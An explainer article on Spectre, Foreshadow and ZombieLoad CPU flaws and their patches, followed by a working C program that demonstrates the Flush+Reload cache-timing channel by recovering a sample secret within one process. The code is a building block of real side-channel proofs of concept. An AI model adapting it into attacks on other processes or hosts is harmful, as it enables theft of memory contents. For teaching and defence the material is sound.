Current CPUs have design flaws. Spectre exposed them, but attacks like Foreshadow and now ZombieLoad exploit similar weaknesses. These “speculative execution” flaws can only truly be fixed by buying a new CPU with built-in protection.
Patches Often Slow Down Existing CPUs
The industry has been frantically scrambling to patch “side-channel attacks” like Spectre and Foreshadow, which trick the CPU into revealing information it shouldn’t. Protection for current CPUs has been made available through microcode updates, operating system-level fixes, and patches to applications like web browsers.
Now, ZombieLoad raises a new threat: to fully lock down a system against this attack, you have to disable Intel's Hyper-Threading, because the attack can read data belonging to the sibling thread that shares a core. That's why Google just disabled Hyper-Threading on Intel Chromebooks. As usual, CPU microcode updates, browser updates, and operating system patches are on their way to try to plug the hole. Most people shouldn't need to disable Hyper-Threading once these patches are in place; the systems where it still matters are those that run untrusted code side by side on the same cores, such as shared cloud hosts.
New Intel CPUs Aren’t Vulnerable to ZombieLoad
But ZombieLoad isn’t a danger on systems with new Intel CPUs. As Intel puts it, ZombieLoad “is addressed in hardware starting with select 8th and 9th Generation Intel® Core™ processors, as well as the 2nd Generation Intel® Xeon® Scalable processor family.” Systems with these modern CPUs aren’t vulnerable to this new attack.
ZombieLoad just affects Intel systems, but Spectre also affected AMD and some ARM CPUs. It’s an industry-wide problem.
The problem here is with “speculative execution”. For performance reasons, modern CPUs automatically run instructions they think they might need to run and, if they don’t, they can simply rewind and return the system to its previous state…
The core problem with both Meltdown and Spectre lies within the CPU's cache. An application can attempt to read memory and, if the data is already in the cache, the read completes faster; if it isn't, the read completes more slowly. The application can measure whether an operation was fast or slow and, while everything else the CPU did during speculative execution is cleaned up and rolled back, the cache state, and so the time the operation took, isn't. An attacker can use that timing difference to read out memory they shouldn't have access to, one bit at a time. Caching speeds things up, but these attacks take advantage of that optimization and turn it into a security flaw.
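The cache-timing channel the paragraph above describes, as an added example that is not part of the original article: a single-process Flush+Reload loop in C. A stand-in "victim" function touches one of 256 page-spaced probe slots indexed by a secret byte; the "attacker" flushes every slot beforehand, times every slot afterwards, and the fastest one reveals the byte. Nothing here is speculative: the victim's load is an ordinary access, and the example only shows that the cache footprint survives exactly where a real attack's transient load would have left it. The names (probe, victim_touch, recover_byte, fastest_slot), the 4 KiB stride, the 16-round majority vote, and the 64 MiB eviction buffer used on non-x86 builds are assumptions of this example, and the sample secret string is constructed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <time.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>   /* __rdtsc, _mm_clflush, _mm_lfence */
#define HAVE_X86 1
#else
#define HAVE_X86 0
#endif

#define NSLOTS 256   /* one probe slot per possible byte value */
#define STRIDE 4096  /* slots one page apart so the prefetcher does not warm neighbours (assumed) */
#define TRIALS 16    /* majority vote over this many flush/touch/reload rounds (assumed) */

static uint8_t probe[NSLOTS * STRIDE];

/* Cycle counter on x86, nanoseconds elsewhere, fenced so the timed load
   cannot be reordered around the two reads of the counter. */
static inline uint64_t now(void) {
#if HAVE_X86
    _mm_lfence();
    uint64_t t = __rdtsc();
    _mm_lfence();
    return t;
#else
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
#endif
}

/* Flush phase: put every slot in the "slow" state. clflush on x86; elsewhere
   evict by streaming through a buffer assumed larger than the last-level cache. */
static void flush_probe(void) {
#if HAVE_X86
    for (int i = 0; i < NSLOTS; i++) _mm_clflush(&probe[(size_t)i * STRIDE]);
#else
    static uint8_t evict[64u << 20];
    for (size_t i = 0; i < sizeof evict; i += 64) evict[i]++;
#endif
}

/* Stand-in for the transient load of a real attack: the only trace it leaves
   is that the slot indexed by the secret byte is now in the cache. */
static void victim_touch(uint8_t secret) {
    volatile uint8_t *p = &probe[(size_t)secret * STRIDE];
    (void)*p;
}

/* Reload phase: time one access to each slot, in a scrambled order so the
   sweep itself does not create a prefetch pattern (167 is odd, so the map is a permutation). */
static void time_slots(uint64_t t[NSLOTS]) {
    for (int i = 0; i < NSLOTS; i++) {
        int s = (i * 167 + 13) & (NSLOTS - 1);
        volatile uint8_t *p = &probe[(size_t)s * STRIDE];
        uint64_t t0 = now();
        (void)*p;
        t[s] = now() - t0;
    }
}

/* Decode step: the slot that reloaded fastest is the one the victim touched.
   Pure function of the timing vector, so it can be checked on constructed input. */
int fastest_slot(const uint64_t t[NSLOTS]) {
    int best = 0;
    for (int i = 1; i < NSLOTS; i++)
        if (t[i] < t[best]) best = i;
    return best;
}

/* Recover one byte the victim never hands over directly: flush, let the victim
   run, reload and time, and vote across rounds to ride out noise. */
int recover_byte(uint8_t secret) {
    static int warmed;
    if (!warmed) { memset(probe, 1, sizeof probe); warmed = 1; }  /* map the pages once */
    int votes[NSLOTS] = {0};
    uint64_t t[NSLOTS];
    for (int r = 0; r < TRIALS; r++) {
        flush_probe();
        victim_touch(secret);
        time_slots(t);
        votes[fastest_slot(t)]++;
    }
    int best = 0;
    for (int i = 1; i < NSLOTS; i++)
        if (votes[i] > votes[best]) best = i;
    return best;
}

int main(void) {
    const char *secret = "ZombieLoad";   /* constructed sample secret */
    char out[32] = {0};
    for (size_t i = 0; secret[i] && i < sizeof out - 1; i++)
        out[i] = (char)recover_byte((uint8_t)secret[i]);
    printf("recovered: %s\n", out);
    return 0;
}
```

Build it with an ordinary `cc -O2 flushreload.c -o flushreload`. On x86 the flush and the timer are the real instructions a Spectre or ZombieLoad proof of concept uses; on other architectures the eviction-buffer fallback is much noisier. On a busy or virtualized machine a byte occasionally comes back wrong, which is exactly why real attacks repeat the measurement and vote, as recover_byte does.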